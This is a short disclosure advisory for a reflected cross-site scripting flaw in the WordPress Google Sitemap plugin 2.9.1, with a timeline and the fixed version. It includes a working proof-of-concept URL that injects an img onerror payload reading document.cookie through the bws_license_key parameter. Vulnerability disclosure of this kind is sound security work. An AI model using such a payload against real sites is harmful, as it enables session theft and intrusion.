WordPress Google Sitemap 2.9.1 Cross Site Scripting
Posted on 17 December 2015
Plugin Name : Google Sitemap Effected Version : 2.9.1 (and most probably lower version's if any) Vulnerability : A3-Cross-Site Scripting (XSS) Identified by : Madhu Akula Technical Details Minimum Level of Access Required : Administrator PoC - (Proof of Concept) : http://localhost/wp-admin/admin.php?page=google-sitemap-plugin.php&action=go_pro bws_license_key =”><img src=x onerror=prompt(document.cookie);> Vulnerable Parameter : bws_license_key Type of XSS : Reflected Fixed in : 2.9.2 http://wordpress.org/plugins/google-sitemap-plugin/changelog/ Disclosure Timeline Vendor Contacted : 2014-08-04 Plugin Status : Updated on 2014-08-07 Public Disclosure : October 3, 2015 CVE Number : Not assigned yet Plugin Description : With the Google Sitemap Plugin you can create and add a Sitemap file to Google Webmaster Tools, and get the info about your site in Google Webmaster Tools.